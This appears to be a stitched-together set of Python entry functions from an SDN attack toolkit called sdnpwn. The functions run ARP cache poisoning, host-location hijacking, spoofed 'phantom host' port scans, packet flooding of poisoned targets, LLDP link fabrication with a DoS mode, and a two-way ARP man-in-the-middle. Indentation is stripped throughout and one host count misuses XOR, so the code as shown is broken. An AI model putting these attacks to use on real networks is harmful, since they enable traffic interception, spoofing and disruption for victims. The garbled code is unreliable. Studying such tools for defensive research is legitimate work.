def run(params):
global poisoningComplete
global haltPoisoning
poisoningComplete = False
haltPoisoning = False
signal.signal(signal.SIGINT, signal_handler)
iface = sdnpwn.getArg(["--iface", "-i"], params)
vIP = sdnpwn.getArg(["--victim", "-v"], params)
vMac = sdnpwn.getArg(["--victim-mac", "-vM"], params)
targetIP = sdnpwn.getArg(["--target-ip", "-t"], params)
newMac = sdnpwn.getArg(["--mac", "-m"], params)
loop = sdnpwn.checkArg(["--loop", "-l"], params)
loopDelay = sdnpwn.getArg(["--delay", "-d"], params, 1)
if (vMac == None):
vMac = sdnpwn.getTargetMacAddress(iface, vIP)
if (vIP == None or vMac == None or targetIP == None or newMac == None):
print(info())
print(usage())
return
thisHostIP = sdnpwn.getIPAddress(iface)
thisHostMAC = sdnpwn.getMacAddress(iface)
if ((thisHostIP == '0') or (thisHostMAC == '0')):
sdnpwn.message("Invalid interface", sdnpwn.ERROR)
return
arpCachePoison(iface, vIP, vMac, targetIP, newMac, thisHostIP, thisHostMAC,
loop, loopDelay)
def run(params):
global haltHijackHostLocation
haltHijackHostLocation = False
signal.signal(signal.SIGINT, signal_handler)
iface = ""
target = ""
loop = False
loopDelay = 1
if ("--iface" in params):
iface = params[params.index("--iface") + 1]
if ("--target" in params):
target = params[params.index("--target") + 1]
if ("--loop" in params):
loop = True
if ("--delay" in params):
loopDelay = params[params.index("--delay") + 1]
targets = []
if (target == ""):
print(info())
print(usage())
return
else:
thisHostIP = sdnpwn.getIPAddress(iface)
startIndex = 0
endIndex = 1
if ("/" in target):
targets = ip_network(target)
startIndex = 1
endIndex = targets.num_addresses - 2
else:
targets = ip_network(str(target) + "/32")
for host in range(startIndex, endIndex):
targetHost = targets[host].exploded
vicMac = sdnpwn.getTargetMacAddress(iface, targetHost)
sdnpwn.message(
"Hijacking location of host " + targetHost + " (" + vicMac +
")", sdnpwn.NORMAL)
if (loop == True):
while (haltHijackHostLocation is not True):
hijackHostLocation(iface, thisHostIP, vicMac)
sleep(loopDelay)
else:
hijackHostLocation(iface, thisHostIP, vicMac)
def run(params):
signal.signal(signal.SIGINT, signal_handler) # Assign the signal handler
iface = sdnpwn.getArg(["-i", "--iface"], params, "eth0")
verbose = sdnpwn.checkArg(["-v", "--verbose"], params)
try:
if (verbose):
sdnpwn.printVerbose("Getting MAC and IP address for interface " +
iface)
ifaceIP = sdnpwn.getIPAddress(iface)
ifaceMac = sdnpwn.getMacAddress(iface)
if (ifaceMac == "0" or ifaceIP == "0"):
sdnpwn.printError("Cannot get details for interface " + iface +
" ")
return
if (verbose):
sdnpwn.printVerbose("Making this host known in the network")
sendp(
Ether(src=ifaceMac, dst="FF:FF:FF:FF:FF:FF", type=0x0806) /
ARP(op=ARP.is_at, psrc=ifaceIP, hwsrc=ifaceMac, pdst=ifaceIP)
) # We just want the controller to know about this host
sdnpwn.printNormal("Sending ARP request for this host...")
resp = srp(Ether(src=ifaceMac, dst="FF:FF:FF:FF:FF:FF", type=0x0806) /
ARP(op=ARP.who_has, pdst=ifaceIP),
timeout=2)
try:
if (resp[0][ARP][0][1].psrc == ifaceIP):
sdnpwn.printWarning("Proxy ARP is active")
else:
sdnpwn.printError("Got another address: " +
resp[0][ARP][0][1].psrc)
except:
# This should only fail if there is no response or the response is not ARP.
sdnpwn.printSuccess("Proxy ARP is not active")
except Exception as e:
print(e)
def run(params):
global scanPrepped
scanPrepped = False
conf.verb = 0 #Set scapy verbose mode off
signal.signal(signal.SIGINT, signal_handler)
interface = None
targetIP = None
targetMAC = None
targetPort = None
phantomIP = None
phantomMAC = None
if ("--iface" in params):
interface = params[params.index("--iface") + 1]
if ("--target-ip" in params):
targetIP = params[params.index("--target-ip") + 1]
if ("--target-mac" in params):
targetMAC = params[params.index("--target-mac") + 1]
if ("--ports" in params):
targetPort = params[params.index("--ports") + 1]
if ("--phantom-ip" in params):
phantomIP = params[params.index("--phantom-ip") + 1]
if ("--phantom-mac" in params):
phantomMAC = params[params.index("--phantom-mac") + 1]
if (interface == None or targetIP == None or targetPort == None
or phantomIP == None):
print(info())
print(usage())
return
if (targetMAC == None):
sdnpwn.message("Sending ARP request for target MAC", sdnpwn.NORMAL)
targetMAC = sdnpwn.getTargetMacAddress(interface, targetIP)
sdnpwn.message("Got target MAC: " + targetMAC, sdnpwn.NORMAL)
if (phantomMAC == None):
phantomMAC = sdnpwn.generateRandomMacAddress()
sdnpwn.message("Generated Phantom host MAC: " + phantomMAC,
sdnpwn.NORMAL)
targetPorts = targetPort.split(",")
sourcePort = getUniqueNum()
tcpSeqNum = getUniqueNum()
thisHostIP = sdnpwn.getIPAddress(interface)
thisHostMAC = sdnpwn.getMacAddress(interface)
if ((thisHostIP == '0') or (thisHostMAC == '0')):
sdnpwn.message("Invalid interface", sdnpwn.ERROR)
exit(0)
prepForScan(interface, targetIP, targetMAC, thisHostIP, thisHostMAC,
phantomIP, phantomMAC)
while (dpap.isPoisoningComplete() == False):
sleep(2)
sdnpwn.message("Waiting for poisoning to complete...", sdnpwn.NORMAL)
sdnpwn.message("Starting port scan", sdnpwn.SUCCESS)
for p in targetPorts:
scan(interface, targetIP, targetMAC, thisHostIP, thisHostMAC,
phantomIP, phantomMAC, p)
sleep(2)
sdnpwn.message("Finishing up...", sdnpwn.NORMAL)
dpap.stopPoisoning()
return
def run(params):
conf.verb = 0
interface = None
target = None
targetMAC = None
phantomIP = None
phantomMAC = None
packetCount = 0
targets = {}
try:
if ("--iface" in params):
interface = params[params.index("--iface") + 1]
if ("--target" in params):
target = params[params.index("--target") + 1]
if ("--phantom-ip" in params):
phantomIP = params[params.index("--phantom-ip") + 1]
if ("--phantom-mac" in params):
phantomMAC = params[params.index("--phantom-mac") + 1]
if ("--packets" in params):
packetCount = int(params[params.index("--packets") + 1])
if (interface == None or target == None or packetCount == None
or phantomIP == None):
print(info())
print(usage())
return
if ("/" in target):
sdnpwn.message("Building list of target hosts (may take a minute)",
sdnpwn.NORMAL)
targetNetSplit = target.split("/")
targetNetHostBits = 32 - int(targetNetSplit[1])
targetNetAddress = targetNetSplit[0]
noOfNetworkHosts = (2 ^ targetNetHostBits) - 2
targetNetAddSplit = targetNetAddress.split(".")
#TODO: Change this to support networks with a mask < 24 bits
finalOctetVal = int(targetNetAddSplit[3])
netAddressTemplate = str(targetNetAddSplit[0]) + "." + str(
targetNetAddSplit[1]) + "." + str(targetNetAddSplit[2]) + "."
for i in range(finalOctetVal, noOfNetworkHosts):
try:
targets[netAddressTemplate +
str(i)] = sdnpwn.getTargetMacAddress(
interface, netAddressTemplate + str(i))
except:
pass
sdnpwn.message("Found " + str(len(targets)) + " targets in total",
sdnpwn.NORMAL)
else:
targets[target] = sdnpwn.getTargetMacAddress(interface, target)
except Exception as e:
print(e)
print(info())
print(usage())
return
if (phantomMAC == None):
phantomMAC = sdnpwn.generateRandomMacAddress()
sdnpwn.message("Generated Phantom host MAC: " + phantomMAC,
sdnpwn.NORMAL)
thisHostIP = sdnpwn.getIPAddress(interface)
thisHostMAC = sdnpwn.getMacAddress(interface)
srcPort = random.randint(35000, 60000)
dstPort = random.randint(35000, 60000)
sdnpwn.message("Starting attack", sdnpwn.NORMAL)
for t in targets:
try:
poisoningThread = Thread(target=dpap.arpCachePoison,
args=(interface, t, targets[t], phantomIP,
phantomMAC, thisHostIP, thisHostMAC,
True, 2)).start()
except Exception as e:
sdnpwn.message("Issue starting poisoning thread", sdnpwn.ERROR)
print(e)
return
while (dpap.isPoisoningComplete() == False):
sleep(1)
sdnpwn.message("Starting packet stream to " + t, sdnpwn.NORMAL)
pkt = preparePacket(t, targets[t], dstPort, phantomIP, thisHostMAC,
srcPort)
sendPacket(interface, pkt, packetCount)
sdnpwn.message("Finishing up...", sdnpwn.NORMAL)
dpap.stopPoisoning()
return
def run(params):
global runningThreads
runningThreads = []
iface1IPAddress = None
iface1NetMask = None
iface2IPAddress = None
iface2NetMask = None
defaultGWIP = None
defaultGWIface = None
externScript = None
iface1 = None
iface2 = None
pipeline = None
if ("--verbose" not in params):
conf.verb = 0
if ("--iface1" in params):
iface1 = params[params.index("--iface1") + 1]
if ("--iface2" in params):
iface2 = params[params.index("--iface2") + 1]
if ("--script" in params):
externScript = params[params.index("--script") + 1]
try:
pipeline = imp.load_source(
(externScript.split(".py")[0]).split("/")[-1], externScript)
except:
sdnpwn.message(
"Error. Could not load external script " + externScript,
sdnpwn.ERROR)
return
sdnpwn.message(
"Warning: The interfaces will become unavailable for general use during the attack.",
sdnpwn.WARNING)
iface1IPAddress = sdnpwn.getIPAddress(iface1)
iface1NetMask = sdnpwn.getNetworkMask(iface1)
iface2IPAddress = sdnpwn.getIPAddress(iface2)
iface2NetMask = sdnpwn.getNetworkMask(iface2)
try:
defaultGWIP = netifaces.gateways()['default'][netifaces.AF_INET][0]
defaultGWIface = netifaces.gateways()['default'][netifaces.AF_INET][1]
except:
sdnpwn.message(
"Could not get default gateway details. Default GW will not be restored after the attack.",
sdnpwn.WARNING)
print("[*] Zeroing interfaces..."),
call(["ifconfig", iface1, "0"])
call(["ifconfig", iface2, "0"])
print("Done.")
sdnpwn.message(
"Running link fabrication attack using interfaces " + iface1 +
" and " + iface2, sdnpwn.NORMAL)
sdnpwn.message("Press Ctrl+C to stop.", sdnpwn.NORMAL)
signal.signal(signal.SIGINT, signal_handler)
if ((iface1 != None) and (iface2 != None)):
pktHandler = packetHandler()
pktHandler.iface1 = iface1
pktHandler.iface2 = iface2
if (pipeline is not None):
pktHandler.pipeline = pipeline
if ("--dos" in params):
pktHandler.forwardLLDPOnly = True
iface1Thread = Thread(target=interface1Listener,
args=(
iface1,
pktHandler,
))
iface2Thread = Thread(target=interface2Listener,
args=(
iface2,
pktHandler,
))
#iface1Thread.daemon = True
#iface2Thread.daemon = True
iface1Thread.setDaemon(True)
iface2Thread.setDaemon(True)
runningThreads.append(iface1Thread)
runningThreads.append(iface2Thread)
iface1Thread.start()
iface2Thread.start()
while (len(runningThreads) != 0):
pass
sdnpwn.message("Restoring interfaces", sdnpwn.NORMAL)
call(["ifconfig", iface1, iface1IPAddress, "netmask", iface1NetMask])
call(["ifconfig", iface2, iface2IPAddress, "netmask", iface2NetMask])
call(["route", "add", "default", "gw", defaultGWIP, defaultGWIface])
sdnpwn.message("Done", sdnpwn.NORMAL)
else:
sdnpwn.message("Missing input", sdnpwn.WARNING)
print(usage())
def run(params):
global runningThreads
runningThreads = []
conf.verb = 0
signal.signal(signal.SIGINT, signal_handler)
interface = None
target1IP = None
target1MAC = None
target2IP = None
target2MAC = None
if ("--iface" in params):
interface = params[params.index("--iface") + 1]
else:
print(info())
print(usage())
return
if ("--target1" in params):
target1IP = params[params.index("--target1") + 1]
if ("--target1-mac" in params):
target1MAC = params[params.index("--target1-mac") + 1]
else:
target1MAC = sdnpwn.getTargetMacAddress(interface, target1IP)
if (interface == None or target1IP == None or target1MAC == None):
print(info())
print(usage())
return
if ("--gateway" not in params):
if ("--target2" in params):
target2IP = params[params.index("--target2") + 1]
if ("--target2-mac" in params):
target2MAC = params[params.index("--target2-mac") + 1]
else:
target2MAC = sdnpwn.getTargetMacAddress(interface, target2IP)
else:
target2IP = netifaces.gateways()['default'][netifaces.AF_INET][0]
target2MAC = sdnpwn.getTargetMacAddress(
interface, target2IP) #getMacFromARPTable(target2IP)
if (target2MAC == ""):
sdnpwn.message("Could not get gateway MAC address", sdnpwn.ERROR)
return
if (target1IP == None or target1MAC == None or target2IP == None
or target2MAC == None):
print(info())
print(usage())
return
thisHostIP = sdnpwn.getIPAddress(interface)
thisHostMAC = sdnpwn.getMacAddress(interface)
if ((thisHostIP == '0') or (thisHostMAC == '0')):
sdnpwn.message("Invalid interface", sdnpwn.ERROR)
exit(0)
sdnpwn.message("Enabling IP Forwarding", sdnpwn.NORMAL)
ipForwarding(1)
p1 = Thread(target=dpap.arpCachePoison,
args=(interface, target1IP, target1MAC, target2IP, thisHostMAC,
thisHostIP, thisHostMAC, True, 1))
p2 = Thread(target=dpap.arpCachePoison,
args=(interface, target2IP, target2MAC, target1IP, thisHostMAC,
thisHostIP, thisHostMAC, True, 1))
p1.setDaemon(True)
p2.setDaemon(True)
runningThreads.append(p1)
runningThreads.append(p2)
p1.start()
p2.start()
sdnpwn.message("Press Ctrl+C to stop...", sdnpwn.NORMAL)
while (len(runningThreads) != 0):
pass